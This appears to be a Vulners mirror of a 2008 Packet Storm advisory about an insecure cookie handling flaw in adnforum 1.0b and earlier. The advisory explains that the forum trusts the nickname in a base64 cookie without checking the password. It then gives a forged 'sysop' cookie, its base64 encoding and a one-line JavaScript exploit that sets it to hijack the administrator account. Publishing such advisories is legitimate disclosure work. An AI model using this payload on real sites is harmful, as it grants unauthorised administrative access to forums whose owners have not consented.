Lucene search
K

adnforums-insecure.txt

🗓️ 24 Sep 2008 00:00:00Reported by PepeluxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Insecure cookie handling vulnerability in adnforum version <= 1.0b allows cookie spoofing.

Code
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
adnforum <= 1.0b / Insecure Cookie Handling Vulnerability   
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
$ Program: adnforum  
$ Version: <= 1.0b  
$ File affected: index.php  
$ Download: http://sourceforge.net/projects/adnforum/  
  
  
Found by Pepelux <pepelux[at]enye-sec.org>  
eNYe-Sec - www.enye-sec.org  
  
  
Cookie is base64 based and the ascii format used is:  
user:23ed4e45887ad4311ff654bd4aab6540:user:0  
user:md5 pass:user:0  
  
Programmer forgot to check the pass and only use the nick to autenticate  
the user.  
  
You can create a fake cookie likes this:  
sysop:000000000000000000000000000000:sysop:0  
  
In base64: c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA  
  
Exploit:  
javascript:document.cookie = "fpusuario=c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA"`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation